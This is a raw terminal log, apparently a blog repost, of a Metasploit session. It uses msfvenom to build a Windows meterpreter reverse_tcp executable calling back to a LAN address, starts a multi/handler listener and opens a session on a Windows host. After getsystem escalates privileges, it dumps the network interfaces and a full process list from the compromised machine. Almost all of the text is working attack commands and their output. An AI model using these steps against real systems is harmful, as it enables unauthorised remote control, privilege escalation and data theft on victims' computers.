root@Debian:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.235 LPORT=6666 -f exe X > /root/0.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of exe file: 73802 bytes root@Debian:~# msfconsole MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM https://metasploit.com =[ metasploit v5.0.2-dev ] + -- --=[ 1852 exploits - 1046 auxiliary - 325 post ] + -- --=[ 541 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] + -- --=[ ** This is Metasploit 5 development branch ** ] msf5 > use exploit/mulit/handler [-] Failed to load module: exploit/mulit/handler msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > show opinions [-] Invalid parameter "opinions", use "show -h" for more information msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set LHOST 192.168.31.235 LHOST => 192.168.31.235 msf5 exploit(multi/handler) > set LPORt 6666 LPORt => 6666 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.31.235:6666 [*] Sending stage (179779 bytes) to 192.168.31.222 [*] Meterpreter session 1 opened (192.168.31.235:6666 -> 192.168.31.222:55438) at 2019-03-20 22:31:32 +0800 meterpreter > cd Usage: cd directory meterpreter > cmd [-] Unknown command: cmd. meterpreter > getid [-] Unknown command: getid. meterpreter > ipconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 3 ============ Name : Realtek RTL8192EU Wireless LAN 802.11n USB 2.0 Network Adapter Hardware MAC : 48:8a:d2:6d:18:5c MTU : 1500 IPv4 Address : 192.168.31.222 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::748c:5a8f:8507:5708 IPv6 Netmask : ffff:ffff:ffff:ffff:: Interface 8 ============ Name : VMware Virtual Ethernet Adapter for VMnet1 Hardware MAC : 00:50:56:c0:00:01 MTU : 1500 IPv4 Address : 192.168.47.1 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::ecef:54ab:e36d:3543 IPv6 Netmask : ffff:ffff:ffff:ffff:: Interface 12 ============ Name : Realtek PCIe GBE Family Controller Hardware MAC : 00:25:11:51:e1:cf MTU : 1500 IPv4 Address : 169.254.52.218 IPv4 Netmask : 255.255.0.0 IPv6 Address : fe80::c5c8:bd71:b772:34da IPv6 Netmask : ffff:ffff:ffff:ffff:: Interface 14 ============ Name : Microsoft Wi-Fi Direct Virtual Adapter Hardware MAC : 4a:8a:d2:6d:18:5c MTU : 1500 IPv4 Address : 169.254.164.149 IPv4 Netmask : 255.255.0.0 IPv6 Address : fe80::514a:ff29:7a13:a495 IPv6 Netmask : ffff:ffff:ffff:ffff:: meterpreter > successful!!!! meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > sessions -i Usage: sessions <id> Interact with a different session Id. This works the same as calling this from the MSF shell: sessions -i <session id> meterpreter > sessions -i 0 Usage: sessions <id> Interact with a different session Id. This works the same as calling this from the MSF shell: sessions -i <session id> meterpreter > meterpreter > sessions -i 1 Usage: sessions <id> Interact with a different session Id. This works the same as calling this from the MSF shell: sessions -i <session id> meterpreter > sessions Usage: sessions <id> Interact with a different session Id. This works the same as calling this from the MSF shell: sessions -i <session id> meterpreter > getlwd /root meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 64 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 320 4 smss.exe x64 0 464 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 536 524 csrss.exe x64 0 632 764 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe 636 524 wininit.exe x64 0 652 628 csrss.exe x64 1 704 636 services.exe x64 0 732 636 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 764 628 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe 888 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 900 636 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 C:\Windows\System32\fontdrvhost.exe 908 764 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe 972 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1084 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1092 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1124 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1176 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1184 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1240 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1260 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1316 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1324 8704 CoreSync.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe 1336 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1368 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1420 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1492 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1576 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 1672 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1684 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1728 1124 MpCmdRun.exe x64 0 NT AUTHORITY\SYSTEM C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1902.2-0\MpCmdRun.exe 1816 704 nvvsvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\nvvsvc.exe 1824 704 nvSCPAPISvr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe 1872 1816 nvxdsync.exe x64 1 NT AUTHORITY\SYSTEM C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe 1880 1816 nvvsvc.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\nvvsvc.exe 1896 6748 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 1932 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1944 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1952 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1972 7040 check_service.exe x86 1 WIN-PUES7CR290R\Administrator C:\Users\Administrator\AppData\Roaming\news_check\check_service.exe 2016 4 Memory Compression x64 0 2036 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 2060 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 2068 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 2120 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 2160 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 2244 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 2296 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 2352 704 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\svchost.exe 2396 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 2460 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 2524 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 2536 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 2600 704 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 2604 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 2636 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 2716 972 TXPlatform.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQ\Bin\TXPlatform.exe 2768 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 2828 972 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe 2868 972 WinStore.App.exe x64 1 WIN-PUES7CR290R\Administrator C:\Program Files\WindowsApps\Microsoft.WindowsStore_11811.1001.18.0_x64__8wekyb3d8bbwe\WinStore.App.exe 2912 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 2980 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 2988 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 3020 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 3232 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 3312 704 AGMService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe 3320 704 AdobeUpdateService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe 3328 704 AGSService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe 3336 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 3360 704 CloudPrint.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Deepin Cloud Print Server\CloudPrint.exe 3368 704 DeepinCloudScanService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Deepin Cloud Scan Server\DeepinCloudScanService.exe 3384 5736 PageGuard.exe x64 1 WIN-PUES7CR290R\Administrator C:\Program Files\PageGuard\PageGuard.exe 3408 704 FlashHelperService.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\Macromed\Flash\FlashHelperService.exe 3432 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 3444 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 3476 6696 Adobe CEF Helper.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe 3484 704 NvNetworkService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe 3508 704 PGService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\PageGuard\PGService.exe 3532 704 QQProtect.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Common Files\Tencent\QQProtect\Bin\QQProtect.exe 3564 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 3576 5736 RAVCpl64.exe x64 1 WIN-PUES7CR290R\Administrator C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe 3588 5736 QQMusic.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Tencent\QQMusic\QQMusic.exe 3596 704 SecurityHealthService.exe x64 0 3632 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 3672 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 3684 704 vmware-authd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe 3704 704 TsService.exe x86 0 NT AUTHORITY\SYSTEM E:\app data\QQBrowser\TsService.exe 3716 704 vmware-usbarbitrator64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe 3728 704 vmnetdhcp.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\vmnetdhcp.exe 3792 704 MsMpEng.exe x64 0 3804 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 4196 972 RuntimeBroker.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\RuntimeBroker.exe 4380 6696 Adobe CEF Helper.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe 4416 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 4460 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 4476 704 vmware-hostd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe 5020 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 5168 6836 wpscenter.exe x86 1 WIN-PUES7CR290R\Administrator C:\Users\Administrator\AppData\Local\Kingsoft\WPS Office\11.1.0.8415\office6\wpscenter.exe 5264 704 svchost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\svchost.exe 5272 1368 sihost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\sihost.exe 5284 5736 YunDetectService.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\?????\BaiduNetdisk\YunDetectService.exe 5292 704 svchost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\svchost.exe 5352 1896 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 5440 1124 taskhostw.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\taskhostw.exe 5448 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 5644 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 5660 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 5736 5632 explorer.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\explorer.exe 5868 5660 ctfmon.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\ctfmon.exe 5932 972 ApplicationFrameHost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\ApplicationFrameHost.exe 5980 704 svchost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\svchost.exe 5996 972 ChsIME.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\InputMethod\CHS\ChsIME.exe 6056 972 SearchUI.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 6148 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 6188 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 6384 972 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe 6392 2352 EPEnvUpdate.exe x86 1 WIN-PUES7CR290R\Administrator C:\Servyou\EnvUpdate\EPEnvUpdate.exe 6400 2352 PTXBootSvc.exe x86 1 WIN-PUES7CR290R\Administrator C:\Servyou\PTXSvcBoot\PTXBootSvc.exe 6424 2352 SyHttpd.exe x86 1 WIN-PUES7CR290R\Administrator C:\Servyou\SyHttpd\SyHttpd.exe 6560 972 RuntimeBroker.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\RuntimeBroker.exe 6592 972 Video.UI.exe x64 1 WIN-PUES7CR290R\Administrator C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19021.10411.0_x64__8wekyb3d8bbwe\Video.UI.exe 6648 2352 SYPNS.exe x86 1 WIN-PUES7CR290R\Administrator C:\Servyou\SYPNS\SYPNS.exe 6696 7280 Creative Cloud.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe 6768 972 ShellExperienceHost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe 6836 6692 wps.exe x86 1 WIN-PUES7CR290R\Administrator C:\Users\Administrator\AppData\Local\Kingsoft\WPS Office\11.1.0.8415\office6\wps.exe 7220 972 RuntimeBroker.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\RuntimeBroker.exe 7228 8704 CCXProcess.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe 7336 5736 DeepinCloudScanConfiger.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Deepin Cloud Scan Server\DeepinCloudScanConfiger.exe 7380 1872 nvtray.exe x64 1 WIN-PUES7CR290R\Administrator C:\Program Files\NVIDIA Corporation\Display\nvtray.exe 7388 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 7432 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 7444 5588 check_ad_helper.exe x64 1 WIN-PUES7CR290R\Administrator C:\Users\Administrator\AppData\Roaming\news_check\temp\check_ad_helper.exe 7524 7380 NvBackend.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe 7608 5392 QQ.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQ\Bin\QQ.exe 7640 7280 vmware-tray.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe 7724 972 SkypeBackgroundHost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.41.54.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe 7836 972 PeopleExperienceHost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\PeopleExperienceHost.exe 8196 3588 qbclient.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Tencent\QQMusic\qbclient\qbclient.exe 8272 5736 0.exe x86 1 WIN-PUES7CR290R\Administrator C:\Users\Administrator\Desktop\0.exe 8492 7228 node.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe 8704 6696 Adobe Desktop Service.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe 8840 8492 conhost.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\conhost.exe 8856 6696 AdobeIPCBroker.exe x86 1 WIN-PUES7CR290R\Administrator C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe 9192 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 9280 10024 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 9312 6836 wpscenter.exe x86 1 WIN-PUES7CR290R\Administrator C:\Users\Administrator\AppData\Local\Kingsoft\WPS Office\11.1.0.8415\office6\wpscenter.exe 9432 11664 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe 9592 972 RuntimeBroker.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\RuntimeBroker.exe 9880 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 9972 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 10024 1896 QQBrowser.exe x86 1 WIN-PUES7CR290R\Administrator E:\app data\QQBrowser\QQBrowser.exe 10508 972 Music.UI.exe x64 1 WIN-PUES7CR290R\Administrator C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19011.11311.0_x64__8wekyb3d8bbwe\Music.UI.exe 10728 972 SystemSettings.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\ImmersiveControlPanel\SystemSettings.exe 10892 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 10904 972 RuntimeBroker.exe x64 1 WIN-PUES7CR290R\Administrator C:\Windows\System32\RuntimeBroker.exe 11164 704 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 11272 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 11664 1124 MpCmdRun.exe x64 0 NT AUTHORITY\SYSTEM C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1902.2-0\MpCmdRun.exe 12236 704 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 12248 704 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 12784 1728 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
原文:https://www.cnblogs.com/2466579747deepin/p/10568380.html